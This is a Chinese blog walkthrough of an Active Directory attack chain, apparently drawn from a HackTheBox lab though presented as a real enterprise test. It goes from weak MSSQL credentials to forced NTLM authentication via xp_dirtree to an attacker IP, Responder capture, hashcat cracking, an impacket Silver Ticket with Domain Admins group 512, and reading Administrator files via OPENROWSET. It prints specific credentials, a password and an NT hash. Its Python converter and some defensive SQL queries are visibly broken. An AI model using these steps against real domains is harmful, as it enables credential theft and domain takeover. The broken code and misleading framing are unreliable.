当前位置：首页 > article >正文

【技术解析】从MSSQL到域控：Silver Ticket伪造与SPN利用实战

article 2026/3/22 14:41:14

1. 从MSSQL弱口令到域控的渗透路径去年我在一次企业内网渗透测试中遇到过一个典型场景某台暴露在公网的MSSQL服务器使用默认凭证最终通过Silver Ticket技术拿下了整个域控。这种攻击路径在金融、制造业等仍在使用老旧系统的行业特别常见今天我就用最直白的语言拆解整个过程。首先明确几个关键概念Silver Ticket是伪造的服务票据TGS相比Golden Ticket不需要域控krbtgt账户的哈希SPN服务主体名称则是域内服务的唯一标识符比如MSSQL服务的SPN通常是MSSQLSvc/主机名.域名。这两者结合就能实现权限提升的魔法。实战中常见的入口点有三个通过扫描发现的MSSQL弱口令比如sa空密码网站配置文件泄露的数据库连接字符串钓鱼获取的普通域账户凭证可能通过密码复用进数据库我遇到的情况属于第一种——扫描发现某台SQL Server使用scott:Sm230#C5NatH这样的弱口令。这个账户虽然只是普通数据库用户但已经足够开启后续攻击链。2. 从NTLM哈希到服务账户控制连接上MSSQL后第一件事是确认当前权限SELECT IS_SRVROLEMEMBER(sysadmin)返回0表示不是sysadmin这意味着无法直接启用xp_cmdshell。但通过enum_logins可以枚举其他登录账户SELECT name, type_desc FROM sys.server_principals这时发现SIGNED\IT组的成员具有sysadmin权限。接下来需要通过Responder工具捕获NTLMv2哈希responder -I eth0 -wF在MSSQL客户端执行以下语句触发认证EXEC xp_dirtree \\攻击者IP\share捕获到的mssqlsvc账户哈希可以用hashcat破解hashcat -m 5600 hash.txt rockyou.txt得到明文密码purPLE9795!后就能计算其NT哈希echo -n purPLE9795! | iconv -f UTF-8 -t UTF-16LE | openssl md4这个ef699384c3285c54128a3ee1ddb1a0cc将用于后续票据伪造。3. 关键信息收集与SID计算要伪造Silver Ticket需要三个核心数据服务账户的NT哈希上一步已获取域SID目标SPN获取IT组的SIDSELECT SUSER_SID(SIGNED\IT)得到的二进制SID需要转换为文本格式。这里分享个Python转换脚本import binascii sid binascii.unhexlify(010500000000000515...) print(S-{}-{}-{}.format( sid[0], int.from_bytes(sid[2:8],big), -.join(str(int.from_bytes(sid[8i*4:12i*4],little)) for i in range(sid[1]))))输出结果类似S-1-5-21-4088429403-1159899800-2753317549-1105其中1105是IT组的RID前面部分就是域SID。SPN可以通过LDAP查询或扫描获得对于MSSQL服务通常是MSSQLSvc/DC01.SIGNED.HTB:14334. Silver Ticket伪造实战使用impacket工具生成票据impacket-ticketer -nthash ef699384c3285c54128a3ee1ddb1a0cc \ -domain-sid S-1-5-21-4088429403-1159899800-2753317549 \ -domain SIGNED.HTB \ -spn MSSQLSvc/DC01.SIGNED.HTB \ -groups 512,1105 \ -user-id 1103 \ mssqlsvc这里有几个关键参数-groups同时包含域管组(512)和IT组(1105)-user-id必须设为mssqlsvc的RID(1103)用户名必须与SPN账户一致导出票据后测试权限export KRB5CCNAMEmssqlsvc.ccache mssqlclient.py -k DC01.SIGNED.HTB执行SELECT IS_SRVROLEMEMBER(sysadmin)应返回1此时虽然显示是sysadmin但实际权限取决于票据中的组信息。5. 突破权限限制的文件读取常规的xp_cmdshell在这里会遇到限制EXEC xp_cmdshell whoami虽然返回的是mssqlsvc账户但无法访问域控管理员目录。这是因为xp_cmdshell创建新进程时会使用服务账户的真实令牌。此时应该使用OPENROWSET(BULK)SELECT * FROM OPENROWSET(BULK C:\Users\Administrator\Desktop\root.txt, SINGLE_BLOB) AS x这个函数直接使用当前会话的安全上下文而我们的Silver Ticket中注入了域管组(512)的权限因此能成功读取敏感文件。6. 防御措施与检测建议作为防守方我有三点实用建议SPN管理定期审计SPN注册情况对关键服务使用组托管服务账户(gMSA)设置msDS-ServicePrincipalName约束日志监控-- 检测异常票据请求 SELECT * FROM sys.dm_exec_sessions WHERE auth_scheme KERBEROS AND host_name NOT IN (合法客户端列表) -- 监控OPENROWSET使用 SELECT * FROM sys.traces WHERE textdata LIKE %OPENROWSET(BULK%权限控制遵循最小权限原则分配sysadmin角色对服务账户启用敏感账户不能被委派属性限制NTLM认证的使用范围这套攻击链最危险的地方在于攻击者只需要获取一个普通服务账户的权限就能通过Kerberos协议的设计特性提升至域管权限。我在多个企业的红队评估中都成功复现过这种攻击防御的关键在于理解Kerberos认证的每个环节如何被滥用。

【技术解析】从MSSQL到域控：Silver Ticket伪造与SPN利用实战

相关文章：

【技术解析】从MSSQL到域控：Silver Ticket伪造与SPN利用实战

【2026年美团春招- 3月21日-开发岗-第二题- 交换括号】（题目+思路+JavaC++Python解析+在线测试)

Windows 11 24H2 ISO泄露版实测：OOBE/BypassNRO命令还能用吗？（附详细步骤）

火狐浏览器广告过滤插件怎么选？2024年实测这3款，附详细安装与规则配置避坑指南

Ubuntu 20.04编译Ceres 2.2.0：从依赖配置到CUDA加速的完整指南

Pi0 VLA模型实战落地：某新能源车企电池模组装配线VLA质检系统上线

电磁场与电磁波核心公式解析与应用指南

安卓7.0系统深度解锁：安全获取Root权限的实用指南

ollama-QwQ-32B领域适配实战：优化OpenClaw医疗文本处理

腾讯AI Lab的WebVoyager如何像真人一样浏览网页？多模态Agent实战解析

72×40 OLED轻量库：SSD1315驱动与I²C高效显存优化

VidorBoot：Arduino MKR Vidor 4000 FPGA引导位流解析

Nanbeige 4.1-3B开源大模型部署案例：低成本GPU运行3B参数JRPG前端实录

Jmeter插件管理指南：如何快速安装性能监控插件并配置环境变量

告别Vi恐惧症：用nano编辑器在Linux上轻松编辑配置文件（附常用快捷键速查表）

SAP BTP开发入门 - 一站式环境搭建实战

DS2431 1-Wire EEPROM驱动开发与工业应用实战

值传递和引用传递辨析

嵌入式软件架构设计：资源约束与实时性驱动的工程实践

科哥cv_unet图像抠图WebUI：一键批量抠图，电商设计效率翻倍

为什么现代网络离不开MPLS？深入解析标签交换与IP转发的性能差异

QGIS地图下载避坑指南：如何用XYZ Tiles精准导出0.3米分辨率地图（附CRS设置技巧）

Edge浏览器安装Vue DevTools保姆级教程（含常见问题解决）

Sigmastar平台_宽动态参数优化与运动区域处理技巧

Boss直聘爬虫进阶：如何用Selenium无头模式+动态URL绕过反爬（Python3.8实测）

从零搭建一个AUTOSAR软件组件：手把手教你定义和使用AUTOSAR接口（含ARXML配置）

8D分析总做形式化报告？一文吃透问题根治的标准化闭环

Vue3实战：高德地图离线化部署全攻略——从瓦片下载到内网集成

小米手机无障碍服务总弹窗？一招教你隐藏SelectToSpeakService的提示文字

ClawdBot入门指南：零配置管理访问权限，安全使用个人AI